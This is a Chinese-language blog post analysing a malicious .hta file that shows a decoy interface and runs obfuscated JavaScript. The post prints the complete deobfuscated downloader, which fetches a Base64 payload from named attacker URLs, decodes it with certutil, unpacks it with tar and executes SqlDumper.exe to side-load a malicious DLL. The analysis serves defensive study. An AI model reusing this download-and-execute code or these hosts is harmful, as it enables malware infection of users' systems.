4.2 “.hta”恶意文件分析

最新推荐文章于 2024-05-03 11:07:56 发布
最新推荐文章于 2024-05-03 11:07:56 发布
阅读量200 收藏 3
点赞数 9
文章标签: python 算法 数据结构 线性回归 sqlite oracle 动态规划
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/A345545108/article/details/138193739
版权

“.hta”恶意文件分析

.hta 文件是一种 HTML 应用程序(HTML Application)的文件类型,它允许使用 HTML、JavaScript和VBScript创建一个本地的Windows应用程序。这种文件类型通常被用于创建简单的 Windows 界面或者执行一些系统管理任务。攻击者也可以有目的编写JavaScript和VBScript做恶意用途。

“.hta”文件执行后,会展示与诱饵pdf主题配套的html界面迷惑用户,同时会执行包含在其中的恶意JavaScript。

格式化经过混淆的JavaScript下载器。 经调试获取外连URL。

hxxps://waterforvoiceless.org/util.php
hxxps://seeceafcleaners[.]co[.]uk/cert.php

 

脚本详细功能如下。

  • 向url “hxxps://waterforvoiceless.org/util.php 发送get请求,下载Base64编码的文本文件
  • 若响应状态码为200,则读取响应内容,写入文件“C:\Windows\Tasks\invite.txt”中。
  • 调用certutil指令解码,将文本文件解码为压缩包文件“C:\Windows\Tasks\invite.zip”
  • 延时3秒,调用tar指令,解压压缩包文件。压缩包中包含“SqlDumper.exe”和“vcruntime140.dll”。vcruntime140.dll是攻击者制作的恶意DLL,在执行sqlwriter.exe时会自动加载。
  • 延时3秒,执行文件"C:\Windows\Tasks\SqlDumper.exe"。

经过格式化和解除混淆完整JavaScript代码如下。

var a = new ActiveXObject("Wscript.Shell");  //创建了一个 WScript Shell 对象,常用于执行系统命令。
function Ijdaskjw(url) {
  var HttpRequest = new XMLHttpRequest();//创建XMLHttpRequest 对象,用于发起 HTTP 请求。
  HttpRequest.onreadystatechange = function () {
    if (HttpRequest.readyState == 0x4 && HttpRequest.status == 0xc8) {//若响应状态码200
      var httpResposneText = HttpRequest.response;//读取响应内容
      var FILE = new ActiveXObject("Scripting.FileSystemObject");//创建FileSystemObject对象,用于文件系统操作
      //创建文本文件,写入响应内容
      var fileDeal = FILE.OpenTextFile("C:\\Windows\\Tasks\\invite.txt", 0x2, true, 0x0);
      fileDeal.Write(httpResposneText);
      fileDeal.close();
      //调用certutil解码 ,文本文件转压缩文件
      a.Run("certutil -decode C:\\Windows\\Tasks\\invite.txt C:\\Windows\\Tasks\\invite.zip", 0x0);
      //延时3秒
      var _0x245d53 = Date.now();
      var _0x3f9f72 = null;
      do {
        _0x3f9f72 = Date.now();
      } while (_0x3f9f72 - _0x245d53 < 0xbb8);
      //调用tar指令解压invite.zip文件
      a.Run("tar -xf C:\\Windows\\Tasks\\invite.zip -C C:\\Windows\\Tasks\\ ", 0x0);
      //延时3秒
      var _0x245d53 = Date.now();
      var _0x3f9f72 = null;
      do {
        _0x3f9f72 = Date.now();
      } while (_0x3f9f72 - _0x245d53 < 0xdac);
      //执行文件
      a.Run("C:\\Windows\\Tasks\\SqlDumper.exe", 0x0);
    }
  };

  //发送请求
  HttpRequest.open("GET", url, true);//"https://waterforvoiceless.org/util.php"
  HttpRequest.send(null);
}

Ijdaskjw("hxxps://waterforvoiceless.org/util.php");

 

A345545108
关注
  • 9
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
ITabcWork.A.hta
11-24
ITabcWork.A.hta
网络安全状况分析报告-2019年5月
systemino的博客
06-17 4501
一、网络安全状况概述 2019年5月,互联网网络安全状况整体指标相对平稳,但出现了一些影响较大的安全事件。 臭名远扬的勒索软件GandCrab背后的运营团队宣称“赚够了退休的钱,将停止GandCrab的更新”,其作恶价值观影响极其恶劣。同时从深信服捕获的攻击事件来看,勒索病毒仍是主要危害,且勒索攻击者的针对性较强,主要结合社会工程、RDP远程爆破等手段投放病毒,制造行业和医疗行业在5月受灾较为...
Kali Linux:网络与安全专家的终极武器
程序边界
11-04 9657
Kali Linux 是一款基于 Debian 的发行版,这意味着它拥有强大的社区支持和丰富的软件资源。它被设计为具有快速、轻量级的特性,特别适合在虚拟机和闪存驱动器上运行。Kali Linux 的目标是成为网络和安全专业人士的首选工具,它提供了广泛的网络安全工具和技术,帮助用户在各种环境中发现和防御漏洞。本书将通过分析黑客采用的攻击战术来提升测试者的渗透测试技能:通过实验室集成到云服务,从而了解在渗透测试中通常被忽略的一个开发维度;
NCJLQCJT邮件系统建设方案
夜澜偶作庄周梦 酒后聊为楚客狂
03-16 9133
第1章       概述... 51.1           xx网络现状... 5第2章       邮件-体系架构设计... 72.1           综述... 72.2           设计原则... 82.3           总体架构... 102.3.1           ExchangeServer 2007/2010邮件系统架构... 102.3.2
Cobalt Strike入门使用
weixin_42282189的博客
09-03 3931
Cobalt Strike入门使用 作者:h0we777 编者注:本文仅供学习研究,严禁从事非法活动,任何后果由使用者本人负责。 0x00 前言 Cobalt Strike是一款基于java的渗透测试神器,常被业界人称为CS。 0x01 简介 Cobalt Strike自3.0以后已经不在使用Metasploit框架而作为一个独立的平台使用,分为客户端与服务端,服务端是一个,客户端可以有多个,非常适合团队协同作战,多个攻击者可以同时连接到一个团队服务器上,共享攻击资源与目标信息和sessions,可模拟
test_v1.6.hta
10-06
test_v1.6.hta
hta文件制作教程.7z
08-02
hta文件制作教程.7z
合并当前路径下所有的excel.hta
09-17
合并当前路径下所有的excel.hta,资源如名字,使用ado读取excel到activeX,递归遍历脚本所在目录下的所有子目录,需要支持<object classid="clsid:0002E559-0000-0000-C000-000000000046" id="Spreadsheet1"/>...
伪造蓝屏,可以伪造蓝屏不是正的.hta
10-08
伪造蓝屏可以装一装自己电脑错误,然后在自己电脑上乱按几个键,就恢复了(PS:乱按是没效果的,乱按的同时按下Alt+F4,就可以恢复正常,无乱码)
【 书生·浦语大模型实战营】作业(六):Lagent & AgentLego 智能体应用搭建
最新发布
专注大数据与人工智能技术分享,欢迎私信加群互相学习!
05-03 712
本篇笔记内容主要为 【书生·浦语大模型实战营】作业(六):Lagent & AgentLego 智能体应用搭建智能体的作业 ,主要对智能体应用理论部分及具体搭建流程详细介绍,并分别进行实战应用及可视化展示,欢迎大家交流学习!
python复习(三)
qq_43710593的博客
04-29 331
类是一种面向。
SpringBoot中实现发送邮件
m0_64289188的博客
04-30 537
当你添加了spring-boot-starter-mail依赖后,Spring Boot会自动配置JavaMailSender实例,并根据application.yml文件中的属性来配置这个实例。你可以直接在需要发送邮件的地方通过@Autowired注解将JavaMailSender实例注入到你的类中,然后使用它来发送邮件。:首先,需要在你的pom.xml文件中添加Spring Boot的邮件发送器依赖。,简化了在Spring Boot应用程序中发送电子邮件的设置过程。Spring Boot的。
python学习笔记----循环语句(四)
取个名字太难了a的博客
04-28 996
随机数种子在生成随机数的过程中起到一个非常重要的作用。它是用于初始化随机数生成算法(伪随机数生成器)的初始值。随机数种子的作用可重复性:当你使用特定的种子值初始化随机数生成器时,即使在不同的运行环境或不同时间,生成的随机数序列都将是相同的。这对于调试和测试非常重要,因为它允许程序的行为在使用随机数时保持一致。控制随机性:种子提供了一种方法来控制随机数生成过程。通过改变种子,你可以获得不同的随机数序列,这对于模拟和其他需要随机输入的应用非常有用。
Day25-Java基础之常用类1
m0_46053885的博客
04-27 1124
同时我们发现Math类中的方法都是静态的,因此在使用的时候我们可以直接通过类名去调用。对于计算机而言,其实是没有数据类型的概念的,都是0101010101,数据类型是编程语言自己规定的,所以在实际存储的时候,先把具体的数字变成二进制,每32个bit为一组,存储在数组中。比较内存地址值一般情况下是没有意义的,我们希望比较的是对象的属性,如果两个对象的属性相同,我们认为就是同一个对象;如果我们的数据是一个浮点类型的数据,有的时候计算机并不会将这个数据完全转换成一个二进制数据,而是将这个将其转换成一个无限的。
链表刷题集
yajunjiao的专栏
04-30 503
本文主要列举了一些刷的题,不多,有那么几道,也建议各位去建立自己的刷题集。积少成多。
pythonpython基础1
七月尘上
04-29 381
注释:单行注释:#多行注释:“”“”“”批量注释:ctl+?,取消注释继续执行一次就行标识符命名规范:1、变量名、类名、函数名只能由数字、字母、下划线组成2、不能以数字开头3、严格区分大小写4、不能以关键字命名定义变量的方式:1、var1 = 值12、var1,var2=值1,值23、var1,var2=值1交换两个变量的值:输出命令解析:sep:输出内容以什么进行分割end:输出以什么结尾file:输出内容以文件形式输出到指定文件
ROS学习教程--第一篇(初试ROS)
隔壁老姚的博客
04-29 532
上述命令,会在工作空间下生成一个功能包,该功能包依赖于 roscpp、rospy 与 std_msgs,其中roscpp是使用C++实现的库,而rospy则是使用python实现的库,std_msgs是标准消息库,创建ROS功能包时,一般都会依赖这三个库实现。该文件定义有关软件包的属性,例如软件包名称,版本号,作者,维护者以及对其他catkin软件包的依赖性。在自定义包basic_correspondence的src目录下创建person_talker.py,编辑以下内容。
python基础知识
2301_77724654的博客
04-28 438
基本输入input(),若要输出整数或小数,可用int(),float()函数进行数据类型转换。缩进:Python使用缩进表示代码块,连续的具有相同缩进的多条语句为一个代码块,语句末尾为代码块的开头,同一个代码块要有相同的缩进。1 在Python3中,print()函数取代了Python2中的print语句。2 Python中程序文件运行方式为程序文件运行,交互式运行两种。赋值语句,简单赋值与序列赋值等,序列赋值可一次为多个变量赋值。注释:单行注释用#,多行注释用'''或'''''''
hta代码中怎么使用JavaScript脚本
05-31
在 HTML 中使用 JavaScript 脚本可以通过以下几种方式: 1. 在 HTML 文件中直接嵌入 JavaScript 代码: ``` <script type="text/javascript"> // JavaScript 代码 </script> ``` 2. 在 HTML 文件中引入外部 JavaScript 文件: ``` <script type="text/javascript" src="脚本文件路径"></script> ``` 3. 在 HTML 标签中使用事件属性绑定 JavaScript 代码: ``` <button onclick="javascript代码">按钮</button> ``` 4. 在 URL 中使用 JavaScript 代码: ``` <a href="javascript:javascript代码">链接</a> ``` 需要注意的是,上述方式中的 JavaScript 代码应该放在 `<script>` 标签中或者在 `href` 或事件属性中直接书写,而不是在 HTML 标签中直接书写。同时,为了避免代码冲突,建议在 JavaScript 代码中使用函数或对象等封装方式进行编写。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值